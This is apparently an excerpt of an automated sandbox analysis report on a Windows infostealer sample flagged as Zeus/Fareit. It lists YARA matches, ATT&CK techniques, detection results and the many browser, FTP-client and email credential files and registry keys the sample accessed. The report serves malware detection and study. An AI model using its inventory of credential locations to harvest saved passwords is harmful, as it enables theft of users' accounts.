              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA391F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00BA391F
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0041022F OleInitialize,GetUserNameA,1_2_0041022F
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA1C70 GetVersionExA,0_2_00BA1C70

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\wcx_ftp.iniJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.ccsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\Frigate3\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\FTP Explorer\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\SiteDesigner\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqliteJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.ccsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqliteJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbarJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\TurboFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\BlazeFtp\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\RhinoSoft.com\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbarJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.ccsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\TurboFTPJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\FTPInfo\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBITJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.jsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\NetSarang\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\BitKinex\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xmlJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\LeapWare\LeapFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\GPSoftware\Directory Opus\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\BitKinex\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xmlJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\AceBITJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\History.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\FTPInfo\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\FileZilla\filezilla.xmlJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\BitKinex\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.sqliteJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Program Files (x86)\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\SharedSettings.ccsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\History.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\SmartFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\GHISLER\wcx_ftp.iniJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\FileZilla\recentservers.xmlJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\ExpanDrive\drives.jsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\BlazeFtp\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\FlashFXP\4\Sites.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\INSoftware\NovaFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\FTP Explorer\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\FTPGetter\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqliteJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.sqliteJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Program Files (x86)\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\NetSarang\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTPJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\SmartFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xmlJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\TurboFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\Frigate3\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\SetupJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.iniJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\AceBIT\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\FileZilla\sitemanager.xmlJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqliteJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\TurboFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\RhinoSoft.com\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\FTP Explorer\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\AceBIT\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\FlashFXP\3\Quick.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\FTPRush\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\Estsoft\ALFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\ExpanDrive\drives.jsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\FlashFXP\3\Sites.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqliteJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xmlJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\BlazeFtp\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbarJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbarJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\FTPGetter\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\SharedSettings.sqliteJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\AceBIT\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.iniJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Windows\32BitFtp.iniJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\FlashFXP\4\Quick.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\3D-FTP\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Frigate3\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\NetSarang\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbarJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\FTPRush\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbarJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.sqliteJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\FlashFXP\3\History.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: HKEY_LOCAL_MACHINE\Software\TurboFTPJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\FlashFXP\4\History.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Windows\wcx_ftp.iniJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword1_2_0040E9CE
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword1_2_0040E9CE

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Valid Accounts
              2
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Valid Accounts
              1
              Valid Accounts
              2
              Obfuscated Files or Information
              2
              Credentials in Registry
              1
              Account Discovery
              Remote Desktop Protocol2
              Data from Local System
              2
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
              Access Token Manipulation
              1
              Install Root Certificate
              Security Account Manager3
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook211
              Process Injection
              1
              DLL Side-Loading
              NTDS15
              System Information Discovery
              Distributed Component Object ModelInput Capture1
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Valid Accounts
              LSA Secrets21
              Security Software Discovery
              SSHKeylogging111
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Access Token Manipulation
              Cached Domain Credentials1
              Process Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
              Process Injection
              DCSync1
              System Owner/User Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              a5gvJhukP7.exe89%ReversingLabsWin32.Infostealer.Zeus
              a5gvJhukP7.exe100%AviraTR/PSW.Fareit.E.390
              a5gvJhukP7.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
